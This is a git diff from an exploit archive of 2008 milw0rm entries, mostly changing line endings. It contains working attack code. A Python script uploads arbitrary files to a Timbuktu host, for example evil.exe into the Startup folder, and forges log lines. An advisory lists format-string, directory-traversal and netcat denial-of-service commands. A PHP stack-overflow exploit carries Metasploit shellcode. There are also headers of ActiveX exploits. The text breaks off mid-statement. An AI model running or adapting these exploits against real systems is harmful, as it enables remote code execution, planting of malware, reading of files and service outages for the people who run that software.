2008-03-11 +# Vendors contacted: Motorola +# Release mode: Forced release + +# Proof of concept code follows. 
This PoC allows a remote attacker to +# upload a file to an arbitrary location on the victim's machine and forge +# peer information on the log lines of the victim's application. + +from sys import argv +from socket import * +from struct import pack + +#from utils import printFormatted +#from time import sleep + +init_send_op_packet = ( '\x00\x01\x60\x00\x00\x52\x00\x25' + '\x00\x22\x02\x01\x00\x04\x03\x07' + '\x00\x05\x00\x01\x00\x00\x00\xf1' + '\x06\x00\xf7\x76\xdd\x77\x00\x00' + '\x00\x00\x08\x7c\x67\x60\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x18\xf1\x06\x00\xd1\x90' + '\xbc\x60\x38\xf1\x06\x00\x32\x94' + '\xc1\x60\x50\x92\xc4\x60\x00\x00' + '\x00\x00\x18\x92\xc4\x60\x2d\xbe' + '\x80\x7c\x08\x7c\x67\x60\x20\x46' + ) + +second_send_op_packet = ( '\x00\x01\x61\x00\x00\x52\x00\x25' + '\x00\x22\x02\x01\x00\x04\x03\x07' + '\x00\x05\x00\x01\x10\x00\xe0\xf0' + '\x06\x00\x51\x05\x91\x7c\x28\x09' + '\x08\x00\x6d\x05\x91\x7c\x1c\xf1' + '\x06\x00\x02\x00\x00\x00\x10\x00' + '\x00\x00\xb8\xf5\xbe\x60\x00\x00' + '\xac\x00\x00\x00\x00\x00\xbd\xf5' + '\xbe\x60\x30\x90\xc4\x60\x07\x00' + '\x00\x00\xd0\x13\x63\x60\x71\xfb' + '\x90\x7c\x40\xf0\x06\x00\x0e\x00' + ) + +peer_info_exchange = ( '\x00\x01\x62\x00\x00\xb0\x00\x23' + '\x07\x22\x03\x07\x70\x2c\xa5\x51' + '\x4c\xca\xe3\xfb\x70\x2c\xa5\x51' + '\x4c\xca\xe3\xfb\x00\x09' + '%(user_name)s' + '\x01\x97' + '%(host_name)s' + '' + '\x00\x00\x01\x02\x00\x04' + '\xb1\x1c\x39\x51\x00\x00\x00\x00' + '%(guest_ip_address)s' + '\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00' + ) + +ack_peer_info = '\xff' + +attach_info_packet = ('\xfb\x00\x00\x00\x00' + 'BINAmdos' + '\xc2\x12\x49\xaf\xbd\x35\xac\x98' + '\x00\x00\x00\x00' + '%(attachment_length)s' + '\x00\x00\x00\x00' + '\xff\xff\xff\xff\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00' + '%(attachment_filename)s' + ) + +attach_info_ack1 = '\xf9\x00' + +# Transfer file content here !!! 
+# \xF8 + 2 byte length + data + +attach_file_ack1 = '\xf7' + +attach_file_ack2 = '\xfa' + + +class Tb2FileSender: + ''' + Fake timbuktu client that implements the 'Notes' feature to send a + message with a file attached to it. + ''' + + def __init__(self, target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content): + ''' + Setup TCP Connection to standard port TCP/407 + ''' + self.sck = socket(AF_INET, SOCK_STREAM) + self.sck.connect((target, 407)) + self.fake_src_ip = fake_src_ip + self.fake_hostname = fake_hostname # Peer computer name + self.fake_username = fake_username # Peer user name + self.dest_filename = dest_filename # Destination filename including path (like ../../a.exe) + self.file_content = file_content # Content of the destination file + + def sendAndRecv(self, packet, log, expected_response_length=0x500, print_response=False): + self.sck.send(packet) + if log: + print '[-] %s' % log + if expected_response_length > 0: + resp = self.sck.recv(expected_response_length) + if print_response: + #printFormatted(resp) + print '-' * 70 + '\n' + return resp + return None + + def getPascalString(self, str): + ''' + Format the strings as 1 Byte Length + String. + ''' + return pack('B', len(str)) + str + + def createFakePeerInfoPacket(self): + ''' + Create a packet with forged guest information to avoid giving away + real info in the log files. + ''' + # + # Ohhh... by the way, these two names goes diretly to the log file... ehehhee :) + # + guest_host_name = self.fake_hostname.replace('\\n', '\r\n') + guest_user_name = self.fake_username.replace('\\n', '\r\n') + + username_max_len = 0x37 # This is not the application real limit, + hostname_max_len = 0x3f # but it is the limit for this packet. 
+ + host_name = self.getPascalString(guest_host_name) + user_name = self.getPascalString(guest_user_name) + + # Pad the string to fill the empty space and avoid packet length recalculation + host_name += ('\x00' * (hostname_max_len - len(guest_host_name))) + user_name += ('\x00' * (username_max_len - len(guest_user_name))) + + guest_ip_address = self.fake_src_ip.split('.') + guest_ip_address = pack('BBBB', int(guest_ip_address[0]), int(guest_ip_address[1]), int(guest_ip_address[2]), int(guest_ip_address[3])) + + return peer_info_exchange % vars() + + def getAttachContent(self): + ''' + Retrieve the content of the local file and send it as the attach content. + ''' + fd = open(self.file_content, 'rb') + data = fd.read() + fd.close() + return data + + def send(self): + ''' + Send a sequence of packet to upload our data to the filename and path + specified by the user's parameters. + ''' + + # Begin protocol negotiation with the target + self.sendAndRecv(init_send_op_packet, 'Note Operation initial packet sent.') + self.sendAndRecv(second_send_op_packet, 'Note Operation negotiation packet sent.') + + # Send the packet with our fake info to fool the logs :) + self.sendAndRecv(self.createFakePeerInfoPacket(), 'Peer info packet sent.') + self.sendAndRecv(ack_peer_info, 'Ack peer info packet sent.') + + # Setup attachment packets that contain information about the file being transfered + max_trx_chunk_size = 0x5B4 + trx_until_resync = 0x16C5 + + payload = self.getAttachContent() + payload_length = len(payload) + attachment_length = pack('>L', payload_length) + + # + # Send info about the attachment. + # + # The '\' character is nedded to bypass the application filter. + # This is actually the Bug ! 
+ attachment_filename = self.getPascalString('\\' + self.dest_filename.replace('\\', '/')) + + attach_info = attach_info_packet % vars() + + self.sendAndRecv(attach_info , 'Attachment info sent.') + self.sendAndRecv(attach_info_ack1, 'Attachment intermediate info sent.') + + # Create a list with the chunks to send and prepare their headers is appropriate + attachment_content = list() + + # We check if the data to send fits into one set of chunks. + if payload_length < max_trx_chunk_size: + attachment_content.append('\xF8' + pack('>H', payload_length) + payload) + else: + # If the data is bigger than one chunk, then send multiple chunks and their headers. + curr_pos = 0 # keeps our current position into the data file content + resync_chunk = True # flag to indicate if a new set of chunk should be set + pos_in_chunk = 0 # keeps our position into the current chunk set + do_recv = False # flag to indicate if recv is needed to receive target data + + while curr_pos <= payload_length: + do_recv = False + # Is this the last chunk ? + if curr_pos > 0 and pos_in_chunk != trx_until_resync: + # If it is the last chunk, then just set length to the rest of the data + if trx_until_resync - pos_in_chunk < max_trx_chunk_size: + chunk_length = trx_until_resync - pos_in_chunk + do_recv = True + else: + # Otherwise, set the data length as usual because it's an intermediate chunk + chunk_length = max_trx_chunk_size data = '' + else: + # Start a new set of chunks and check if this is not the last set + # If it is, then don't set the maximun size, just the rest of the length. + data = '\xF8' # Set the chunk set header + if payload_length - curr_pos < trx_until_resync: + chunk_length = payload_length - curr_pos + data += pack('>H', chunk_length) + else: + # This is not the last chunk, so we set the maximun size and begin + # it transmittion. 
+ chunk_length = max_trx_chunk_size + data += pack('>H', trx_until_resync) pos_in_chunk = 0 + + # Append the current chunk into a list to be sent later + attachment_content.append((do_recv, data + payload[curr_pos : curr_pos + chunk_length])) + curr_pos += chunk_length + pos_in_chunk += chunk_length + + # + # Send file content in small chunks + # + print '[-] Beginning file transfer... (this may take some time)' + for chunk in attachment_content: + if chunk[0]: + do_recv = 0x500 + else: + do_recv = 0 + self.sendAndRecv(chunk[1], '', do_recv) + #sleep(0.5) + print '[-] File transfer complete' + + # Send the final ACKs to allow the program to create the remote file. + self.sendAndRecv(attach_file_ack1, 'Note body intermediate info sent.') + self.sendAndRecv(attach_file_ack2, 'Note body intermediate info sent.') + + # Close the connection here to avoid the program displaying any message + self.sck.close() + return + + +if __name__ == "__main__": + if len(argv) != 7: + print (r'\nUsage:\n\n%s ' + ' \n\n' + 'Example:\n\n' + '%s victim.com 1.2.3.4 trust.com yourAdmin "..\..\..\Documents And Settings\All Users\Start Menu\Programs\Startup\evil.exe" c:\payload.exe' % (argv[0], argv[0]) ) + else: + target = argv[1] + fake_src_ip = argv[2] + fake_hostname = argv[3] + fake_username = argv[4] + dest_filename = argv[5] + file_content = argv[6] + + tb2 = Tb2FileSender(target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content) + tb2.send() + +# milw0rm.com [2008-03-11] diff --git a/platforms/windows/remote/5264.html b/platforms/windows/remote/5264.html index d7ed62b5d..43f923230 100755 --- a/platforms/windows/remote/5264.html +++ b/platforms/windows/remote/5264.html @@ -1,67 +1,67 @@ - - - - - - - - -# milw0rm.com [2008-03-16] + + + + + + + + +# milw0rm.com [2008-03-16] diff --git a/platforms/windows/remote/5269.txt b/platforms/windows/remote/5269.txt index 75ab89857..bb676e3d5 100755 --- a/platforms/windows/remote/5269.txt 
+++ b/platforms/windows/remote/5269.txt 
@@ -1,130 +1,130 @@ -####################################################################### - - Luigi Auriemma - -Application: MG-SOFT Net Inspector - http://www.mg-soft.com/netinsp.html - (bug C affects any MgWTrap3 service which is included in - almost all the MG-SOFT products like MIB Browser, Query - Manager, Trap Ringer Pro and so on) -Versions: Net Inspector <= 6.5.0.828 -Platforms: Windows and Linux -Bugs: A] format string in mghttpd - B] directory traversal in mghttpd - C] crash in MgWTrap3 - D] Denial of Service in niengine -Exploitation: remote -Date: 14 Mar 2008 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bugs -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - ->From vendor's website: -"MG-SOFT Net Inspector is a powerful fault management application with -alarming subsystem that complies with the international alarm reporting -recommendations (ITU X.733). The software lets you effectively monitor -the status of network devices and manage alarms associated with devices -in the supervised TCP/IP network." - - -####################################################################### - -======= -2) Bugs -======= - ---------------------------- -A] format string in mghttpd ---------------------------- - -mghttpd is a simple HTTP daemon running on port 5228 used to allow the -clients to download the Net Inspector Java Client. -This server is affected by a format string vulnerability located in the -function which logs the clients requests in the log file. 
- - ---------------------------------- -B] directory traversal in mghttpd ---------------------------------- - -This service is also affected by a classical directory traversal -vulnerability using both the slash and backslash plain delimiters which -can be exploited to download files from the disk on which is located -the server. - - --------------------- -C] crash in MgWTrap3 --------------------- - -The SNMP Trap Service other than binding the local TCP port 8888 and -the UDP 162 for collecting SNMP queries, binds also an additional UDP -port which changes each time the service is executed (uses the first -free available port). -Sending a packet (empty or with any desired content since it's not -important) directly to this port raises an exception which terminates -the service immediately. -This service is the core of almost all the MG-SOFT products which so -result all vulnerable. - - --------------------------------- -D] Denial of Service in niengine --------------------------------- - -The Net Inspector Fault Management server (niengine) can be easily -freezed with CPU at 100% and full memory consumption through a -malformed or incomplete packet. 
- - -####################################################################### - -=========== -3) The Code -=========== - - -A] -GET /%n%n%s%s%n%n%n%s HTTP/1.0 - -B] -GET ../../../../boot.ini HTTP/1.0 -GET \../..\../..\windows/win.ini HTTP/1.0 - -C] -echo|nc SERVER PORT -v -v -u - -D] -echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1 - - -####################################################################### - -====== -4) Fix -====== - - -No fix - - -####################################################################### - -# milw0rm.com [2008-03-17] +####################################################################### + + Luigi Auriemma + +Application: MG-SOFT Net Inspector + http://www.mg-soft.com/netinsp.html + (bug C affects any MgWTrap3 service which is included in + almost all the MG-SOFT products like MIB Browser, Query + Manager, Trap Ringer Pro and so on) +Versions: Net Inspector <= 6.5.0.828 +Platforms: Windows and Linux +Bugs: A] format string in mghttpd + B] directory traversal in mghttpd + C] crash in MgWTrap3 + D] Denial of Service in niengine +Exploitation: remote +Date: 14 Mar 2008 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bugs +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +>From vendor's website: +"MG-SOFT Net Inspector is a powerful fault management application with +alarming subsystem that complies with the international alarm reporting +recommendations (ITU X.733). The software lets you effectively monitor +the status of network devices and manage alarms associated with devices +in the supervised TCP/IP network." 
+ + +####################################################################### + +======= +2) Bugs +======= + +--------------------------- +A] format string in mghttpd +--------------------------- + +mghttpd is a simple HTTP daemon running on port 5228 used to allow the +clients to download the Net Inspector Java Client. +This server is affected by a format string vulnerability located in the +function which logs the clients requests in the log file. + + +--------------------------------- +B] directory traversal in mghttpd +--------------------------------- + +This service is also affected by a classical directory traversal +vulnerability using both the slash and backslash plain delimiters which +can be exploited to download files from the disk on which is located +the server. + + +-------------------- +C] crash in MgWTrap3 +-------------------- + +The SNMP Trap Service other than binding the local TCP port 8888 and +the UDP 162 for collecting SNMP queries, binds also an additional UDP +port which changes each time the service is executed (uses the first +free available port). +Sending a packet (empty or with any desired content since it's not +important) directly to this port raises an exception which terminates +the service immediately. +This service is the core of almost all the MG-SOFT products which so +result all vulnerable. + + +-------------------------------- +D] Denial of Service in niengine +-------------------------------- + +The Net Inspector Fault Management server (niengine) can be easily +freezed with CPU at 100% and full memory consumption through a +malformed or incomplete packet. 
+ + +####################################################################### + +=========== +3) The Code +=========== + + +A] +GET /%n%n%s%s%n%n%n%s HTTP/1.0 + +B] +GET ../../../../boot.ini HTTP/1.0 +GET \../..\../..\windows/win.ini HTTP/1.0 + +C] +echo|nc SERVER PORT -v -v -u + +D] +echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1 + + +####################################################################### + +====== +4) Fix +====== + + +No fix + + +####################################################################### + +# milw0rm.com [2008-03-17] diff --git a/platforms/windows/remote/5332.html b/platforms/windows/remote/5332.html index abfe63931..2041e0b2c 100755 --- a/platforms/windows/remote/5332.html +++ b/platforms/windows/remote/5332.html @@ -1,130 +1,130 @@ - - - - Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit - - - - - - - Unable to create object - - - - - -# milw0rm.com [2008-04-01] + + + + Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit + + + + + + + Unable to create object + + + + + +# milw0rm.com [2008-04-01] diff --git a/platforms/windows/remote/5338.html b/platforms/windows/remote/5338.html index 43d08157e..1b6be16d2 100755 --- a/platforms/windows/remote/5338.html +++ b/platforms/windows/remote/5338.html 
@@ -1,23 +1,23 @@ --------------------------------------------------------------------- - ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite - url: www.chilkatsoft.com - - Author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not responsible for any damage. --------------------------------------------------------------------- - - - - - - -# milw0rm.com [2008-04-01] +-------------------------------------------------------------------- + ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite + url: www.chilkatsoft.com + + Author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not responsible for any damage. +-------------------------------------------------------------------- + + + + + + +# milw0rm.com [2008-04-01] diff --git a/platforms/windows/remote/5395.html b/platforms/windows/remote/5395.html index f91385026..63fc5e8c9 100755 --- a/platforms/windows/remote/5395.html +++ b/platforms/windows/remote/5395.html @@ -1,43 +1,43 @@ -
    -------------------------------------------------------------------------------------
    - Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods
    - url: http://www.datadynamics.com
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2008-04-07] +
    +------------------------------------------------------------------------------------
    + Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods
    + url: http://www.datadynamics.com
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2008-04-07] diff --git a/platforms/windows/remote/5397.txt b/platforms/windows/remote/5397.txt index dc638b1ca..dda928bb6 100755 --- a/platforms/windows/remote/5397.txt +++ b/platforms/windows/remote/5397.txt 
@@ -1,61 +1,61 @@ -Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities -Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com) -Severity: High -Impact: Remote Code Execution -Vulnerable Systems: MS Windows Systems -Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} -Solution: Upgrade the vendor's patch -Vendor's Homepage: http://www.cdnetworks.com -Reference: How to stop an ActiveX control from running in Internet Explorer - http://support.microsoft.com/kb/240797/ko - http://support.microsoft.com/kb/240797/en-us -History: - - 02.27.2008: Initiate notify - - 03.06.2008: The vendor patched - - After: The vendor are applying the patch to their customers. - -Description: -Neffycient Download is a ActiveX control used to download and to upgrade -such as game install files through HTTP, FTP, etc. It has two -vulnerabilities. -1st, a attacker can copy a malicious file to any path such as start program -folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup). -2nd, a attacker can issue keycodes which are used to restrict execution on -other domains. - -Object: -I notify this vulnerability not to promote abnormal uses but to make -a software more secure. This vulnerability was patched by the vendor's -positive effort. I hope this information helps many people who try -to study security and to develop an application. - -1. Remote Code Execution -First of all, we must have write permission on a board in a web site used -this ActiveX or obtain a valid keycode which is correct to your site. -An Attacker who has a valid keycode can make a expolit by modifying -HttpSkin, -SkinPath's values. Malicious files which is on attacker's site must -be compressed as ZIP file. -For instance. The below modification copies abnormal files to Windows's -root directory. - - - -In this way an attacker can modify SkinPath's value to All Users's Start -Program Folder. 
Then he can execute his malicious program when the user -restarts his computer. - -2. Generating a KeyCode Value -An attacker can make the keycode generator by debugging this ActiveX -control. A keycode's value has two meaning. First two digits represent -the domain's length(hexadecimal). -Next five(or more) digits are valuable numbers to calculate a domain. -The keycode check the procedure of this ActiveX control likes below. -It calculates the keycode's value and returns four bytes as a result. -Next it starts the domain's calculation and returns four bytes. -Finally, it compares with these four bytes to check whether the site is -valid. -I made a PoC using inline assembly and C. But it doesn't open to the public -because of the vendor's request. (Just refer above descriptions.) - -# milw0rm.com [2008-04-07] +Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities +Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com) +Severity: High +Impact: Remote Code Execution +Vulnerable Systems: MS Windows Systems +Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} +Solution: Upgrade the vendor's patch +Vendor's Homepage: http://www.cdnetworks.com +Reference: How to stop an ActiveX control from running in Internet Explorer + http://support.microsoft.com/kb/240797/ko + http://support.microsoft.com/kb/240797/en-us +History: + - 02.27.2008: Initiate notify + - 03.06.2008: The vendor patched + - After: The vendor are applying the patch to their customers. + +Description: +Neffycient Download is a ActiveX control used to download and to upgrade +such as game install files through HTTP, FTP, etc. It has two +vulnerabilities. +1st, a attacker can copy a malicious file to any path such as start program +folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup). +2nd, a attacker can issue keycodes which are used to restrict execution on +other domains. 
+ +Object: +I notify this vulnerability not to promote abnormal uses but to make +a software more secure. This vulnerability was patched by the vendor's +positive effort. I hope this information helps many people who try +to study security and to develop an application. + +1. Remote Code Execution +First of all, we must have write permission on a board in a web site used +this ActiveX or obtain a valid keycode which is correct to your site. +An Attacker who has a valid keycode can make a expolit by modifying +HttpSkin, +SkinPath's values. Malicious files which is on attacker's site must +be compressed as ZIP file. +For instance. The below modification copies abnormal files to Windows's +root directory. + + + +In this way an attacker can modify SkinPath's value to All Users's Start +Program Folder. Then he can execute his malicious program when the user +restarts his computer. + +2. Generating a KeyCode Value +An attacker can make the keycode generator by debugging this ActiveX +control. A keycode's value has two meaning. First two digits represent +the domain's length(hexadecimal). +Next five(or more) digits are valuable numbers to calculate a domain. +The keycode check the procedure of this ActiveX control likes below. +It calculates the keycode's value and returns four bytes as a result. +Next it starts the domain's calculation and returns four bytes. +Finally, it compares with these four bytes to check whether the site is +valid. +I made a PoC using inline assembly and C. But it doesn't open to the public +because of the vendor's request. (Just refer above descriptions.) + +# milw0rm.com [2008-04-07] diff --git a/platforms/windows/remote/5398.html b/platforms/windows/remote/5398.html index 064b365a7..ae736d83c 100755 --- a/platforms/windows/remote/5398.html +++ b/platforms/windows/remote/5398.html @@ -1,131 +1,131 @@ - - - - - - - - - -# milw0rm.com [2008-04-07] + + + + + + + + + +# milw0rm.com [2008-04-07] 
diff --git a/platforms/windows/remote/5489.html b/platforms/windows/remote/5489.html index 83c2b9c64..5eb77fe62 100755 --- a/platforms/windows/remote/5489.html +++ b/platforms/windows/remote/5489.html @@ -1,26 +1,26 @@ -Vulnerability class : Arbitrary file overwrite -Discovery date : 21 April 2008 -Remote : Yes -Credits : J. Bachmann & B. Mariani from ilion Research Labs -Vulnerable : Zune software: EncProfile2 Class - -An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package. -If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file. - -POC: - - - - - - - - -# milw0rm.com [2008-04-23] +Vulnerability class : Arbitrary file overwrite +Discovery date : 21 April 2008 +Remote : Yes +Credits : J. Bachmann & B. Mariani from ilion Research Labs +Vulnerable : Zune software: EncProfile2 Class + +An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package. +If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file. + +POC: + + + + + + + + +# milw0rm.com [2008-04-23] diff --git a/platforms/windows/remote/5496.html b/platforms/windows/remote/5496.html index 0d7ba6e1d..ab8e45a04 100755 --- a/platforms/windows/remote/5496.html +++ b/platforms/windows/remote/5496.html 
@@ -1,54 +1,54 @@ -**************************************************************************************************************** -Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0 -Remote: Yes -An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0. -by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r -**************************************************************************************************************** - - - - - - - - - - - - - - - - - - - - - - - - - - -# milw0rm.com [2008-04-25] +**************************************************************************************************************** +Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0 +Remote: Yes +An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0. +by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r +**************************************************************************************************************** + + + + + + + + + + + + + + + + + + + + + + + + + + +# milw0rm.com [2008-04-25] diff --git a/platforms/windows/remote/5511.html b/platforms/windows/remote/5511.html index 0f0cc556a..7deef0f18 100755 --- a/platforms/windows/remote/5511.html +++ b/platforms/windows/remote/5511.html 
@@ -1,35 +1,35 @@ -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& -Insecure Methods in HP Update Software. -Remote: Yes -Execute code remotely is possible using methods ExecuteAsync and Execute :-) -If a user visits the malicious page the attacker can execute code. -Coded by callAX -&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& - -Proof of Concept ----------------- - - - - - - - - - - -# milw0rm.com [2008-04-27] +&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& +Insecure Methods in HP Update Software. +Remote: Yes +Execute code remotely is possible using methods ExecuteAsync and Execute :-) +If a user visits the malicious page the attacker can execute code. +Coded by callAX +&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& + +Proof of Concept +---------------- + + + + + + + + + + +# milw0rm.com [2008-04-27] diff --git a/platforms/windows/remote/5530.html b/platforms/windows/remote/5530.html index 8cfc838a0..d84cebf2f 100755 --- a/platforms/windows/remote/5530.html +++ b/platforms/windows/remote/5530.html @@ -1,122 +1,122 @@ - - - - -Microsoft Works 7 WkImgSrv.dll Exploit - -Coded by lhoang8500 -lhoang8500[at]gmail[dot]com - BKIS Center - Vietnam - - - - - - - - - - -# milw0rm.com [2008-05-02] + + + + +Microsoft Works 7 WkImgSrv.dll Exploit + +Coded by lhoang8500 +lhoang8500[at]gmail[dot]com + BKIS Center - Vietnam + + + + + + + + + + +# milw0rm.com [2008-05-02] diff --git a/platforms/windows/remote/5536.php b/platforms/windows/remote/5536.php index 9c5ac408a..0e4890478 100755 --- a/platforms/windows/remote/5536.php +++ b/platforms/windows/remote/5536.php 
@@ -1,99 +1,99 @@ - JMP EAX*/ - -# win32_bind - Calc executer. Metasploit.com -$shellcode = -"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4". -"\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1". -"\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed". -"\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9". -"\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2". -"\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80". -"\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f". -"\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc". -"\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0". -"\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4"; - -$evilcode = str_repeat("\x90", 100); -$evilcode.= $shellcode; -$evilcode.= str_repeat("\x90", 16156-(strlen($shellcode))); - -$evilcode.= "\xFD\xAF\x6A\x07"; #076AAFFD FFE4 => JMP ESP (cstrike\dlls\mp.dll) - - -$evilcode.= str_repeat("\x90", 60-(strlen($scode))); -$evilcode.= $scode; -$evilcode.= str_repeat("\x90", 8); -$evilcode.= str_repeat("0", 72); -$evilcode.= str_repeat("%00", 4); -$evilcode.= str_repeat("0", 4); -$evilcode.= "\x20\xF0\xFD\x7F"; #Windows PEB Lock Pointer -$evilcode.= str_repeat("%00", 8); - -$post = "rconpass=" . $evilcode . "&setcookiesNULL=rconpass"; - -$pack = "POST /auth.w?redir= HTTP/1.1\r\n"; -$pack.= "Host: {$host}:{$port}\r\n"; -$pack.= "User-Agent: Mozilla/5.0\r\n"; -$pack.= "Accept: */*\r\n"; -$pack.= "Accept-Language: en-us,en;q=0.5\r\n"; -$pack.= "Accept-Encoding: gzip,deflate\r\n"; -$pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; -$pack.= "Keep-Alive: 300\r\n"; -$pack.= "Connection: keep-alive\r\n"; -$pack.= "Content-Type: application/x-www-form-urlencoded\r\n"; -$pack.= "Content-Length: ". strlen($post) ."\r\n\r\n" . 
$post; - -echo "[~] Sending...\r\n"; - -$sock = @fsockopen($host, $port, $errno, $errstr, 10); - if ($errstr) - echo("[-] Can't connect {$host}:{$port}\r\n"); - else { - fputs($sock, $pack); - $tmp = fgets($sock,1024); - if(strstr($tmp, '<')) - echo "[-] Failed, you better try again.\r\n"; - else - echo "[+] Shellcode should be executed.\r\n"; - fclose($sock); - } -?> - -# milw0rm.com [2008-05-03] + JMP EAX*/ + +# win32_bind - Calc executer. Metasploit.com +$shellcode = +"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4". +"\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1". +"\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed". +"\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9". +"\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2". +"\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80". +"\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f". +"\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc". +"\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0". +"\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4"; + +$evilcode = str_repeat("\x90", 100); +$evilcode.= $shellcode; +$evilcode.= str_repeat("\x90", 16156-(strlen($shellcode))); + +$evilcode.= "\xFD\xAF\x6A\x07"; #076AAFFD FFE4 => JMP ESP (cstrike\dlls\mp.dll) + + +$evilcode.= str_repeat("\x90", 60-(strlen($scode))); +$evilcode.= $scode; +$evilcode.= str_repeat("\x90", 8); +$evilcode.= str_repeat("0", 72); +$evilcode.= str_repeat("%00", 4); +$evilcode.= str_repeat("0", 4); +$evilcode.= "\x20\xF0\xFD\x7F"; #Windows PEB Lock Pointer +$evilcode.= str_repeat("%00", 8); + +$post 